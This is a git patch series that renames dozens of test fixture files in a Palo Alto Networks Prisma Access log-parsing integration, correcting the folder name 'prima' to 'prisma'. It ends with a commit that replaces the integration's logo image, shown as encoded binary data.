diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/User_id_2_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/User_id_2_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/auth_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/auth_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/file_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/file_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/file_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_without_int.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_without_int.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/hip_match_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/hip_match_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/icmp_allow_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/icmp_allow_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/iptag_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/iptag_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_1.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_1.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_2.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_2.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/sctp_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/sctp_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/system_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/system_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/system_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/tcp_allow_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/tcp_allow_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_cloud_election_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_cloud_election_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dhcp_renew_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dhcp_renew_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dns_proxy_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dns_proxy_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dns_response.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dns_response.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_file_alert_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_file_alert_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_installed_package_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_installed_package_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_ldap_brute_force.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_ldap_brute_force.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_file_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_file_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_threat_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_threat_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_url_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_url_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_ntp_sync_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_ntp_sync_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_port_up_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_port_up_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_registration_succeed_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_registration_succeed_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_10_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_10_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_11_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_11_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_12_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_12_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_1_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_2_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_2_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_3_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_3_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_4_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_4_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_5_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_5_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_6_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_6_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_7_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_7_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_8_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_8_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_9_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_9_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_threat.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_threat.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_threat.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_threat_02.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_threat_02.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_timestamp_palo.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_timestamp_palo.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_1_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_2_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_2_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_update_content_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_update_content_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_upgrade_package_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_upgrade_package_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_user_authentication_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_user_authentication_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_userid.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_web_authentication_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_web_authentication_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_wildfire_failure_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_wildfire_failure_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat-url-xff.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat-url-xff.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic1_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic1_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic2_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic2_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic_with_resotimestamp.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic_with_resotimestamp.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/udp_deny_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/udp_deny_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/url_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/url_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/url_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/userid_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/userid_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/wildfire1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/wildfire1_json.json
From 59aa04e0546762f062fd47c7c7d6b3f55de5cc43 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Wed, 16 Oct 2024 16:50:15 +0200
Subject: [PATCH 155/317] fix(PaloAlto): fix prisma access logo
---
 .../paloalto-prisma-access/_meta/logo.png | Bin 13410 -> 8994 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png b/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png index 344ec7ecd5bb31a7e641101881f5767a5ecb4a1a..1a8d0ff1f238f359de5f0eb7929e740a444baecf 100644 GIT binary patch literal 8994 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 